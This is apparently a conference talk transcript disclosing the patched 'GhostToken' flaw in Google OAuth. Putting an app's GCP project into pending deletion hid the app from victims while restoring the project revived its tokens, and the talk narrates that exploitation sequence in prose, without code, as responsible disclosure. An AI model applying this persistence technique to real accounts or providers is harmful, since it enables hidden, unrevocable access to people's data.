 So, hey, everyone. I'm very excited to be here. And for this talk, I hope you have nerves of steel because today's story is a ghost story. OK, so this story is not your average ghost story. It's not about a haunted house or a deserted mental hospital. This one is scary for hackers specifically. It's about apps having invisible access to your Google account. So it all started a bit over a year ago in June 2022. And while I was playing around with Google Apps, I discovered the ghost token vulnerability, which basically allows attackers to create apps that are invisible while still having access to your Google account. And this vulnerability is pretty unique. It's not an XSS or a CSRF. And it doesn't even fall into any of the cloud vulnerability categories either. And I think it makes it especially interesting to understand why the vulnerability happened. And I think that we have a lot to learn from it, looking into the future, which is something that we'll explore at the end of the story. So before we begin, a little bit about myself. So my name is Tal. And in the past decade, I was involved in hacking in all sorts of ways. In my previous job, I hacked vehicle computers on a daily basis. In 2016, maybe it's finally time to confess that I was part of the team that broke Pokemon's Go anti-cheating system. And I also have a master's degree in theoretical computer science. And right now, I work as a senior security researcher and team lead. And Asterisk security were, among other things, I look at how different providers implement machine-to-machine and non-human identities authorization between each other. And these are my socials. Feel free to contact me. I will be able to be happy to talk about anything that I did and this talk. And you can also approach me after the talk. OK, so we're finally ready to start our story. The ghost token vulnerability is related to how Google designed and implemented an authorization framework named OAuth. First, then, we need to understand what is OAuth, why it's needed, and how it works. So let me start by going into the past, the year of 2007, before OAuth existed. And the first iPhone was just released, as you can see here. And everyone wanted one. And whoever had one probably went and posted about it on Facebook. So enter a developer named Ann. And Ann has a brilliant idea. She will create an app in which she will scan your email contacts and look for them on Facebook so you can connect to each other and brag about having an iPhone. So she does create an app. You give this app your email address and your password. And it will scan your contacts. Great. Yeah, what? So actually, this is how the world looked like without OAuth. If you wanted to use any third-party application and give it access to your Google account, you actually needed to give it your email address and your password. And I guess we were fine with it. And today, I guess it's pretty clear to you why it's not very good. But let me state the glaring issues. So the first one is why the app only needed partial access to your account. For instance, in Ann's case, it only needed access to your contact. It actually got full access to your Google account. The second problem is if you wanted to remove access to this account after you used it, you needed to change your password. This was the only way you can get rid of it. But then, all other apps you give an access to also lose access. The third point is most people, especially back then, probably use the same password for their online banking accounts. So you don't want to go around and give your password to anyone. And this is where OAuth comes in. And in fact, the problem was identified in 2006 and a walking group that was created to solve it released a final draft of the open authorization which is shortened to OAuth. I'm just going to call it OAuth from now on. And three years later, it was released as an RFC, the first version of OAuth. And in the very nice analogy of one of OAuth's co-creators, Iran Hammer, gives a brief outline of how OAuth works. So luxury cars today come with a special valet key. It's a special key that will not allow whoever has it to drive more and in a few miles. Some valet key will not open the trunk. Others will block access to your on-board cell phone address book. And the idea here is very clever. So you give someone a special key with a limited access to your car while using your regular key to use everything, to unlock everything. And this idea translates almost directly to OAuth. Actually, two years after the first vision, the second version of OAuth was released as an RFC, greatly extending the use cases of OAuth and simplifying the protocol inside of it. And as you notice, I highlighted that they decided to call it the OAuth framework. So as opposed to other maybe protocols or standard, OAuth 2 lays out the basic foundation of how the protocol works. But it leaves a lot of places for the implementers of OAuth to decide how to do. And this, you'll see in a few slides, was one of the main reasons that ghost token vulnerability existed in the first place. Now it's an excellent time to go back to the present. And today, let me tell you that OAuth is everywhere. Every time you see an app, a machine to machine authorization, anything related to authorization without using a password, it is done based on OAuth 2. You also have public marketplaces offering millions of apps used by millions of people. Here you can see Slack, Google, and Microsoft public marketplaces. OK, so now we know why we needed OAuth and how it's used, but let's see how it works. So this is how the framework looks like in a very simplified view. We have Ann, who hasn't aged a day since 2007, and now she wants to use OAuth to create her app. So the first thing she does is approach Google and register her app. And Google, in return, gives Ann two values, a unique identifier called the client ID, which identifies her app, and a second, secret value. Now, sometimes later, a user named Vikram wants to use Ann's app. So Ann sends Vikram to Google alongside the client ID identifying her app, and a list of permission that the app needs to operate. Google, in response, shows Vikram what's called the consent page. It's a page where Vikram can see the name of the app, in this case, Example app, and the list of permission that he needs to operate. And Vikram has the ability to either consent to this authorization or not. Let's say that Vikram wants to use the app, and he consents to this app. Then what happens is Google generates a one-time code and sends it through Vikram to Ann. As a final step, Ann takes this one-time code generated by Google, and the secret value she got in the first step approaches Google, exchanges these two values for a token. And this token is used to access Vikram's data. So what happens is that Ann holds a special token with a limited permission to Vikram's account. In this case, you only ask for the email address. So this token has only access to this. OK. So, oops. Sorry. So this is how OAuth is laid out in the framework. However, I'm actually going to focus not on this part of OAuth, but actually the things that were unsaid. So I'm going to call it the OAuth missing pieces. There are two missing pieces where basically the source of the ghost token vulnerability. The first one, I glanced over it very quickly, but it's the process of upper distration. So I just said Ann goes to Google, she registers an app, and every time everyone is happy. But in fact, this is how it is laid out in the RFC itself. So besides two technical things that Ann needs to provide Google, then the last thing, which is I think the most important thing, like information about Ann and her app, is actually completely up to Google to decide how to implement. So the framework really doesn't deal with all of that. And there are many questions with there's still an answer here. Like, exactly what information is required for Ann to provide when she registers her app? And maybe more importantly, what part of this information is verified and showed to Vikram when Vikram comes and wants to authorize this app? The second missing piece is the part of what I call the user management, the user's app management feature. And you notice there's nothing from the RFC here because the RFC doesn't talk about it at all. So let's say Vikram installs 10 different apps. Now Vikram wants to see a list of his apps, what permission they got, and maybe remove their access. So the RFC doesn't really mind all of that and doesn't say if this thing even must be implemented. And even most providers today do give this management feature, and you have a list of apps where you can decide to remove. But there's still questions here. Like, what information is displayed? Can I see the last time the app accessed my data? Which data was accessed? And indeed, both of these questions and all the questions about the app registration basically go unanswered in RFC, leading to different providers implementing them very differently. There's a big gap in how each provider implemented these things. And for our case, for the ghost token vulnerability, let's look at how Google decided to implement them. So for the app registration process, it used to be very simple. You just go to Google, say hi, hello, my name is Tal. I want to register an app. And you get the client ID and secret you needed. Everyone was happy. But about six years ago, Google made a move in which they made app being contained inside Google Cloud Platform project. So as a developer that wants to use to make a new app, the first thing you actually need to do is register for Google Cloud Platform, GCP. And then create a GCP project. Once you have a GCP project, inside this project, you can set up your consent screen, which means providing some values, most of them are optional, about your app. And then only then you can get your client ID and secret that you needed. So I mean, my guess is basically maybe Google made this move in order to sway developers into using one of the services contained inside GCP because they're already registered. And they have to do that in order to create an app. So this is how app registration works today in Google. For the second missing piece, the management page for users, actually, there is a designated setting page in each of one of your Google account on which you can see all apps you're getting access to and what kind of permission you gave them. And you have the ability to remove their access. And it's important to know for the rest of the talk that there is no other place in which you can manage apps. This is a sole page where you can see all apps you've given access to and can remove them. And if you want, you can scan this QR code and go to your setting space and see all apps you've given access to. But if you don't really like scanning QR codes, I also provided an image of how this app looks like. And you can see a number of apps I've given access to. And if I click on one of these apps, I can see the permission that I gave them. For instance, this AI mail assistance has access to my email but doesn't have access to my drive. And I also have a button on which I can click and remove the access of this app. OK, so we've seen why we need OAuth, how it works, and the missing pieces of OAuth and how they were implemented in Google. Now we're finally ready to see some ghosts. So the discovery of the ghost token vulnerability happened like many other vulnerabilities. It was very unexpected. So at my job, we do routine analysis of Google environments of different customers. And in one customer, we noticed something weird. We noticed an app whose name was suddenly changed to be its identifier. Usually we see app names that are human readable. And suddenly it was changed to the same thing as the unique ID given to the app. And we didn't really know what happened. But we speculated that this happens if the app is being deleted by the developer of the app. So the backend in Google gets confused and doesn't know where to take the app name from. So it defaults to this ID. So we tested it, like good researchers do. We created a GCP project. Within, we created an app. We installed it on some test users. And then we went into this project and deleted the client ID that we generated for this app. And once we did, the following things happened. So first, the name of the app became its client ID. So we were able to reproduce this weirdness. But as, again, good researchers do, we didn't stop there, and we tried to abuse this. So we took the client ID, we just deleted, and tried to use it. And we got this error, which says that the client ID is deleted. And also, all tokens previously given by Google authorizing the app stopped working. So we couldn't use them anymore. The developer couldn't use them anymore. And also, the app disappeared from the management pages of all users who installed it. So now you look at this and you say, well, that seems reasonable, right? The app is deleted. I expect it to be completely removed from everywhere it was, but I want you to recall that I said that today, upper distration in Google, when you create a client ID, it's actually contained within a GCP project. So this begs the question, what if instead of deleting the client ID, we deleted the entire GCP project? So we went ahead and tried that. So we went to my, to some project in GCP that had an app inside of it that some users installed. And we deleted it. And once you delete a GCP project, it enters a special limbo state. They call it a pending deletion state. And once the project was in pending deletion state, the app contained within this project behaved similarly to when it was deleted directly. So the client ID couldn't be used anymore, all tokens previously given to the app stopped working, and also the app disappeared from the user management pages who installed it. But as you can see on the image here, you have a button to restore projects. So once you delete a project in GCP, you have 30 days to regret your decision deleting it, and actually restore it to a previous state. So what would happen to the tokens of the app if we restore the project? So you might have guessed it or not, I don't know. But actually all tokens given previously to the app started working again once we restored the project. Do you notice the ghost? So let's recap what just happened. Let's say our developer from before, Ann, decided to turn evil and become an attacker. So we call her Evil Ann. So let's say Vikram installs one of Ann's apps. And now if Ann combines the fact that once she deletes the project associated with the app, the user Vikram can't see the app anymore and remove its access. But when Ann restores the project associated with the app, the token belonging to Vikram starts working again and Ann can access Vikram's data. So what she can do is actually keep the project in a pending deletion state. And whenever she wants to access Vikram's data, she restores it, access the data, and then removes it again. So Vikram can't remove her app. And in essence, Ann holds some kind of a ghost token to Vikram's data that Vikram cannot get rid of. So you can relax, the vulnerability is patched now. I will talk about it in a few slides. But unfortunately it means there's no live demo. I did pre-record the demo of me exploiting this on a victim account. So let's see it. So here we have a victim that is convinced to install my totally innocent app, and I promise you it was totally innocent at the time. So this is how the consent screen looks like and the victim give access to their drive files. And once they do it, this is the attacker point of view. I immediately get the token belonging to the victim and then I quickly run over to the GCP project associated with the app, and I delete it. And once I do it, it enters a pending deletion state. And this can happen automatically. You can even write a two-line script that does it for you. You don't have to do it manually if you're lazy like me. And let's go back to the victim's point of view. You can see this is the victim because of the V on the top right there. And this is the list of all apps, victim, the victim, given access to. As you can notice, totally innocent app is not present on this list. So the victim, at any point in time, cannot do anything about it. The victim can't even know that the app is installed on their account, but notice that this is back to the attacker point of view. At any time that I want to, I can restore the GCP project that I deleted. We lost time. Okay. So at any time we can restore the GCP project that we deleted before and then use the same token that we received before to access the user's drive files. This is what happens here. And once we do that, we can immediately, after getting the victim's files, we can shut down the project again and restore it to its deleted state, pending the recent state, so the victim cannot remove it. Okay. So we reported the vulnerability to Google when we discovered it and we worked together on a fix which wasn't as simple because it involves some like deep infrastructural changes to Google. So you can read more about what the patch did exactly to solve this vulnerability as well as some little details about the research that I didn't have time to go through here in the blog post. What about it? Just search it online, GoStock and you'll find it. Okay. So we've seen the GoStock and vulnerability and let's discuss some takeaways of this vulnerability. Okay. So first, the vulnerability in my opinion has probably been opened ever since Google made the move to contain apps inside GCP, which happened around six years ago. And actually because the management page of the users is so severely lacking in audit of who access your data and when, it's basically impossible to know if someone exploited this vulnerability. Let's imagine one of the developers having one of the million of apps, one developer was bad and decided to exploit this vulnerability. Would we even notice? Would anyone know that? There's no way to know that and I think this makes the threat potential of GoStock pretty huge. We have no idea if it was ever exploited. The second takeaway is actually if you recall back to the two missing pieces, so the fact that Google made it so apps are contained inside GCP project, together with the fact that they have not enough audit logs related to how app access your data, together made two mistakes made the vulnerability happen. And these mistakes, I don't hold it against Google. It's actually things that are not mentioned in the RFC at all. So maybe this is a message to you if you're ever involved in implementing Oath in your organization, you need to put special attention actually on the things that are not written in RFC, how you implement them and make sure there's no such vulnerability in them as well. The third point is directed at researchers in the cloud which I think are most of you here. So I've been doing stuff related to all vulnerabilities in the past five years or so and whenever I read information regarding vulnerabilities, it's always very confusing and convulated. And I hope this one was a bit clearer regarding Oath, but I see many researchers shy away from looking at these areas of Oath. I think that actually because Oath is just a framework and the implementation differs a lot between providers, it's actually a very good rich surface for vulnerability research and I implore you to look at it at your next research. To wrap up this talk, I would like to finally look into the future and I would like to give some sort of a vision of how I see the next iteration of Oath. So the first thing I want to see is a change of how we register apps in different platforms. So today you need to go to each individual platform you want to make an app for, to GitHub, to Slack, to Google, et cetera, and you need to register your app separately and each of them has a completely separate way to verify and do this all registration process and I imagine a consolidated centralized platform where developers can one time register their app and it will be immediately available in all platforms they want it to be. Additionally, while they register, they can either be completely anonymous and basically don't give any information about their app or maybe they're a very well-respected company who has no problem verifying a lot of information about themselves and they can give all this information to this centralized platform. Of course, the important thing here is that while when a user comes to authorize an app, all this information will be fully transparent and shown to the user helping user make way better decisions when deciding whether to allow or deny access to apps they want to use. The second part is about the user management page. So, indeed, today all providers that I've looked at provide least of all apps you've given access to and the ability to remove it. But I think that's still lacking. I, as a user, would like to know which app accessed my data, which data was accessed, and maybe more identify details about the access like IP address or user agent so I can be more in control of where my data is and who is accessing it. These two fixes, by the way, would also fix the problem with the go-stop vulnerability. The last part of the vision is a bit of a smaller one. So, all of those many use cases today in the RFC and even three years ago another use cases was added. I think there are many parts, many use cases, still present today in the RFC, that are a bit outdated and nobody really uses them anymore and I would be happy to see them gone. I don't like backwards compatibility. Additionally, one of the most promising use cases that we see everywhere today is machine-to-machine authorization. Right now people implementing machine-to-machine authorization use OAuth in some weird backwards way in order to implement that and I would be happy to see a specific use case in the RFC designed to lay the foundation of how machine-to-machine authorization works. So, to wrap up this talk, I presented a full overview of a unique vulnerability in Google OAuth design. We analyzed how maybe the insufficient OAuth framework was partly to blame for this bug and finally we discussed some ways that we as a community should make in order to change how OAuth works like and prevent from potentially having this kind of catastrophic vulnerabilities in the future. Thank you all for listening. Have a good day.